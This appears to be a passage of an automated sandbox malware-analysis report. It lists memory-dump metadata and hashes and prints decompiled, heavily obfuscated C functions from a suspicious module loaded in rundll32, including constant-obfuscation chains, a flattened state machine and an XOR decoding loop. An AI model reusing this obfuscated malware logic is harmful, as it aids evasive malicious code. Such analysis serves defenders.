                                                                                                                      0x002b7979
                                                                                                                      0x002b7971
                                                                                                                      0x002b7a38
                                                                                                                      0x002b7a3a
                                                                                                                      0x002b7a3f
                                                                                                                      0x002b7a3f
                                                                                                                      0x002b7a46
                                                                                                                      0x002b7a46
                                                                                                                      0x002b7a02
                                                                                                                      0x002b7a07
                                                                                                                      0x002b7a0a
                                                                                                                      0x002b7a0f
                                                                                                                      0x002b7a0f
                                                                                                                      0x002b7a0f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: 875be9c42ce7875ef5b072345f9938c46be6840d3acf6f8d8af5e92f8e384e49
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 40615571109342AFC768CF21C98A95BBBF1FBC8358F509A1CF1DA96220D3758A19CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002CEBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				void* _t91;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				signed int _t111;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t116;
                                                                                                                      				void* _t131;
                                                                                                                      				void* _t132;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t131 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t91);
                                                                                                                      				_v28 = 0x7108be;
                                                                                                                      				_v28 = _v28 + 0x734d;
                                                                                                                      				_v28 = _v28 + 0xa8e4;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v28 = _v28 + 0xffff8493;
                                                                                                                      				_t114 = 0xcca5bf9;
                                                                                                                      				_v28 = _v28 ^ 0x0074778b;
                                                                                                                      				_v20 = 0xc2a60c;
                                                                                                                      				_v20 = _v20 >> 5;
                                                                                                                      				_v20 = _v20 ^ 0x558996ec;
                                                                                                                      				_v20 = _v20 ^ 0x55851de9;
                                                                                                                      				_v12 = 0x41ee29;
                                                                                                                      				_t21 =  &_v12; // 0x41ee29
                                                                                                                      				_t109 = 0x29;
                                                                                                                      				_v12 =  *_t21 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x09c82f39;
                                                                                                                      				_v32 = 0x1f5650;
                                                                                                                      				_v32 = _v32 >> 1;
                                                                                                                      				_v32 = _v32 / _t109;
                                                                                                                      				_v32 = _v32 ^ 0xe76a4887;
                                                                                                                      				_v32 = _v32 ^ 0xe76186a0;
                                                                                                                      				_v36 = 0x15f4a6;
                                                                                                                      				_v36 = _v36 | 0x84842460;
                                                                                                                      				_v36 = _v36 + 0x9b66;
                                                                                                                      				_t110 = 0x43;
                                                                                                                      				_v36 = _v36 / _t110;
                                                                                                                      				_v36 = _v36 ^ 0x01f36aaa;
                                                                                                                      				_v4 = 0xe58fa8;
                                                                                                                      				_v4 = _v4 >> 0xf;
                                                                                                                      				_v4 = _v4 ^ 0x0008ca28;
                                                                                                                      				_v8 = 0x294ac3;
                                                                                                                      				_v8 = _v8 + 0xffff78db;
                                                                                                                      				_v8 = _v8 ^ 0x0024bdda;
                                                                                                                      				_v16 = 0xcf6d8f;
                                                                                                                      				_v16 = _v16 >> 5;
                                                                                                                      				_v16 = _v16 + 0x1116;
                                                                                                                      				_v16 = _v16 ^ 0x000942b4;
                                                                                                                      				_v24 = 0xd07c42;
                                                                                                                      				_v24 = _v24 | 0x50b68ca9;
                                                                                                                      				_t111 = 0x74;
                                                                                                                      				_v24 = _v24 / _t111;
                                                                                                                      				_v24 = _v24 << 3;
                                                                                                                      				_v24 = _v24 ^ 0x05925fb7;
                                                                                                                      				while(_t114 != 0x2cca53b) {
                                                                                                                      					if(_t114 == 0x3850c59) {
                                                                                                                      						E002B68DE(_v4, _v8, _v16, _v24,  *0x2d5214);
                                                                                                                      					} else {
                                                                                                                      						if(_t114 == 0xcca5bf9) {
                                                                                                                      							_push(_t114);
                                                                                                                      							_push(_t114);
                                                                                                                      							_t116 = 0x50;
                                                                                                                      							 *0x2d5214 = E002C3512(_t116);
                                                                                                                      							_t114 = 0xd9a7a55;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t114 == 0xd96b1a6) {
                                                                                                                      								_t132 = E002CEE11(_t131, _v32, _v36, _a8);
                                                                                                                      								if(_t132 == 0) {
                                                                                                                      									_t114 = 0x2cca53b;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t114 != 0xd9a7a55) {
                                                                                                                      									L12:
                                                                                                                      									if(_t114 != 0xca68b5e) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(E002D0D5B() != 0) {
                                                                                                                      										_t114 = 0xd96b1a6;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				E002B6D80();
                                                                                                                      				_t114 = 0x3850c59;
                                                                                                                      				goto L12;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: 7f1d408d93160338bfdce28dd4f1e9c67986923c2f94590ca3c85359a64bbacc
                                                                                                                      • Instruction ID: 8b79118d6217d91361f274696f4cef7c9c98392737b9adba96c1905789c34fd7
                                                                                                                      • Opcode Fuzzy Hash: 7f1d408d93160338bfdce28dd4f1e9c67986923c2f94590ca3c85359a64bbacc
                                                                                                                      • Instruction Fuzzy Hash: AD5157715193019FCB08CE26D88991FBBE1EBC8758F118A1DF58656260D371DA5A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002D1993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				intOrPtr _t138;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v52 = 0x104;
                                                                                                                      				_push(0x104);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(0x104);
                                                                                                                      				_v68 = 0x5658b2;
                                                                                                                      				_t138 = 0;
                                                                                                                      				_v64 = 0x871b59;
                                                                                                                      				_v60 = 0xa8976a;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v40 = 0xee5304;
                                                                                                                      				_v40 = _v40 >> 0xa;
                                                                                                                      				_v40 = _v40 ^ 0x00002b94;
                                                                                                                      				_v24 = 0xe2229b;
                                                                                                                      				_v24 = _v24 >> 2;
                                                                                                                      				_v24 = _v24 << 0xa;
                                                                                                                      				_v24 = _v24 ^ 0xe22b2fd9;
                                                                                                                      				_v8 = 0x13a34a;
                                                                                                                      				_t126 = 0x7b;
                                                                                                                      				_v8 = _v8 * 0x58;
                                                                                                                      				_v8 = _v8 * 0x7c;
                                                                                                                      				_v8 = _v8 >> 6;
                                                                                                                      				_v8 = _v8 ^ 0x01172ec8;
                                                                                                                      				_v16 = 0x4f354;
                                                                                                                      				_t127 = 0x1c;
                                                                                                                      				_v16 = _v16 / _t126;
                                                                                                                      				_v16 = _v16 | 0x38cda962;
                                                                                                                      				_v16 = _v16 << 7;
                                                                                                                      				_v16 = _v16 ^ 0x66d4d439;
                                                                                                                      				_v12 = 0x949837;
                                                                                                                      				_v12 = _v12 ^ 0x28b93813;
                                                                                                                      				_v12 = _v12 + 0xffff414d;
                                                                                                                      				_v12 = _v12 + 0xcc4e;
                                                                                                                      				_v12 = _v12 ^ 0x282f8cad;
                                                                                                                      				_v44 = 0x4b103d;
                                                                                                                      				_v44 = _v44 + 0xffffdccd;
                                                                                                                      				_v44 = _v44 ^ 0x0043fba2;
                                                                                                                      				_v28 = 0xbeb96;
                                                                                                                      				_v28 = _v28 + 0xffffd9aa;
                                                                                                                      				_v28 = _v28 >> 0xd;
                                                                                                                      				_v28 = _v28 ^ 0x000a38bb;
                                                                                                                      				_v48 = 0xb1bdc9;
                                                                                                                      				_v48 = _v48 + 0x24fd;
                                                                                                                      				_v48 = _v48 ^ 0x00b0c363;
                                                                                                                      				_v36 = 0x53e429;
                                                                                                                      				_v36 = _v36 + 0xffff530c;
                                                                                                                      				_v36 = _v36 / _t127;
                                                                                                                      				_v36 = _v36 ^ 0x0005d2bf;
                                                                                                                      				_v20 = 0xb0734b;
                                                                                                                      				_v20 = _v20 | 0x98e9e8ae;
                                                                                                                      				_v20 = _v20 + 0x857e;
                                                                                                                      				_v20 = _v20 << 3;
                                                                                                                      				_v20 = _v20 ^ 0xc7d86034;
                                                                                                                      				_v32 = 0x655a5c;
                                                                                                                      				_v32 = _v32 >> 8;
                                                                                                                      				_v32 = _v32 | 0x0e60c7ff;
                                                                                                                      				_v32 = _v32 ^ 0x0e677ecd;
                                                                                                                      				_t120 = E002C3C1B(_t127, _a16, _v40);
                                                                                                                      				_t137 = _t120;
                                                                                                                      				if(_t120 != 0) {
                                                                                                                      					_t138 = E002C1785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
                                                                                                                      					E002C4DAD(_v48, _v36, _t137, _v20, _v32);
                                                                                                                      				}
                                                                                                                      				return _t138;
                                                                                                                      			}























                                                                                                                      0x002d1b0d
                                                                                                                      0x002d1b15
                                                                                                                      0x002d1b19
                                                                                                                      0x002d1b38
                                                                                                                      0x002d1b44
                                                                                                                      0x002d1b49
                                                                                                                      0x002d1b53

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: 105909a55c8e425be0aa7aaf09fd0d731b0291631c050f8b3f23c8ea646ff5b9
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: 0F5102B2C00209EBCF49DFE5D98A8EEFBB1FB48704F208159E511B6210D3B54A59CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002BBB4B(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				signed int* _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      				unsigned int* _t65;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t68;
                                                                                                                      				signed int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				unsigned int _t77;
                                                                                                                      				unsigned int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_push( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				_push( *(_t94 + 0x24));
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t50 = E002BCF25( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				 *(_t94 + 0x20) = 0xfe2925;
                                                                                                                      				_t4 =  &(_t50[1]); // 0x4
                                                                                                                      				_t81 = _t4;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
                                                                                                                      				 *(_t94 + 0x1c) = 0x6df10d;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
                                                                                                                      				 *(_t94 + 0x34) = 0x26c28e;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
                                                                                                                      				_t68 =  *_t50;
                                                                                                                      				_t82 =  &(_t81[1]);
                                                                                                                      				_t52 =  *_t81 ^ _t68;
                                                                                                                      				 *(_t94 + 0x24) = _t68;
                                                                                                                      				 *(_t94 + 0x28) = _t52;
                                                                                                                      				_t33 = _t52 + 1; // 0x1
                                                                                                                      				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
                                                                                                                      				_t95 = _t94 + 8;
                                                                                                                      				_t65 = E002C3512(_t84);
                                                                                                                      				 *(_t95 + 0x2c) = _t65;
                                                                                                                      				if(_t65 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t80 = _t65;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t66 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t75 =  *_t82;
                                                                                                                      							_t82 =  &(_t82[1]);
                                                                                                                      							_t76 = _t75 ^ _t66;
                                                                                                                      							 *_t80 = _t76;
                                                                                                                      							_t80 =  &(_t80[1]);
                                                                                                                      							_t77 = _t76 >> 0x10;
                                                                                                                      							 *((char*)(_t80 - 3)) = _t76 >> 8;
                                                                                                                      							 *(_t80 - 2) = _t77;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((char*)(_t80 - 1)) = _t77 >> 8;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t65 =  *(_t95 + 0x28);
                                                                                                                      					}
                                                                                                                      					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
                                                                                                                      				}
                                                                                                                      				return _t65;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 87f053ad9e0b77dc2265ade498515ec88ef29a7164ecf0f810bd81458a48ee9a
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 38319972A093028FD344CF28C88445AFBE0FF98718F454A5DF88997242DB74EA19CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002BF154(void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				char _v44;
                                                                                                                      				short _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char _v576;
                                                                                                                      				void* _t83;
                                                                                                                      				intOrPtr* _t85;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v56 = 0xd50633;
                                                                                                                      				_v52 = 0xe1ee45;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v24 = 0xad73ca;
                                                                                                                      				_v24 = _v24 ^ 0x73620612;
                                                                                                                      				_v24 = _v24 ^ 0x73c7a99a;
                                                                                                                      				_v32 = 0x597259;
                                                                                                                      				_t89 = 0x52;
                                                                                                                      				_push(_t89);
                                                                                                                      				_v32 = _v32 / _t89;
                                                                                                                      				_v32 = _v32 ^ 0x0009f267;
                                                                                                                      				_v20 = 0xd3cfac;
                                                                                                                      				_v20 = _v20 << 9;
                                                                                                                      				_v20 = _v20 | 0x4896bc35;
                                                                                                                      				_v20 = _v20 ^ 0xef9372aa;
                                                                                                                      				_v28 = 0xdbc61e;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x01b432fd;
                                                                                                                      				_v16 = 0x90d5a3;
                                                                                                                      				_v16 = _v16 + 0xffffb729;
                                                                                                                      				_v16 = _v16 + 0xffff3d25;
                                                                                                                      				_v16 = _v16 ^ 0x0089c5ce;
                                                                                                                      				_v8 = 0xd44b29;
                                                                                                                      				_v8 = _v8 + 0x631b;
                                                                                                                      				_v8 = _v8 | 0x8b07e3a3;
                                                                                                                      				_v8 = _v8 * 0x62;
                                                                                                                      				_v8 = _v8 ^ 0x88a24378;
                                                                                                                      				_v12 = 0x36955e;
                                                                                                                      				_v12 = _v12 + 0xb114;
                                                                                                                      				_v12 = _v12 + 0xffffe207;
                                                                                                                      				_v12 = _v12 ^ 0x0030a900;
                                                                                                                      				_v36 = 0x9daa5e;
                                                                                                                      				_v36 = _v36 + 0xffffbce6;
                                                                                                                      				_v36 = _v36 ^ 0x0093fbb5;
                                                                                                                      				_v40 = 0x60d009;
                                                                                                                      				_v40 = _v40 >> 1;
                                                                                                                      				_v40 = _v40 ^ 0x003d09ba;
                                                                                                                      				_t96 = _v24;
                                                                                                                      				_t83 = E002B5C03( &_v576, _v24, _v32);
                                                                                                                      				_pop(0);
                                                                                                                      				if(_t83 != 0) {
                                                                                                                      					_t85 =  &_v576;
                                                                                                                      					if(_v576 != 0) {
                                                                                                                      						while( *_t85 != 0x5c) {
                                                                                                                      							_t85 = _t85 + 2;
                                                                                                                      							if( *_t85 != 0) {
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      							}
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						 *((short*)(_t85 + 2)) = 0;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_push(0);
                                                                                                                      					_push(0);
                                                                                                                      					E002B884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
                                                                                                                      				}
                                                                                                                      				return _v44;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: de5df10244a724c767f3286296383f51ce8cb4698ddaf5dd2a153a62ed8e9049
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 1041F372C1121EABCF59CFE4C94A9EEBBB5FF04304F108199D411B62A0E3B51A54DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002BCA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t229;
                                                                                                                      				void* _t247;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t257;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t263;
                                                                                                                      				intOrPtr _t288;
                                                                                                                      				signed int _t289;
                                                                                                                      				signed int _t290;
                                                                                                                      				signed int _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				void* _t294;
                                                                                                                      				void* _t295;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t287 = _a12;
                                                                                                                      				_t261 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t229);
                                                                                                                      				_v64 = 0x836860;
                                                                                                                      				_t288 = 0;
                                                                                                                      				_v60 = 0x763ad4;
                                                                                                                      				_t295 = _t294 + 0x18;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v132 = 0xf23cd2;
                                                                                                                      				_t263 = 0x1cd9a3d;
                                                                                                                      				_v132 = _v132 + 0xffff66b2;
                                                                                                                      				_v132 = _v132 + 0xffff69fc;
                                                                                                                      				_v132 = _v132 << 8;
                                                                                                                      				_v132 = _v132 ^ 0xf1039f05;
                                                                                                                      				_v140 = 0x375552;
                                                                                                                      				_v140 = _v140 << 6;
                                                                                                                      				_v140 = _v140 ^ 0xd2a5ef1f;
                                                                                                                      				_v140 = _v140 >> 0xb;
                                                                                                                      				_v140 = _v140 ^ 0x00122384;
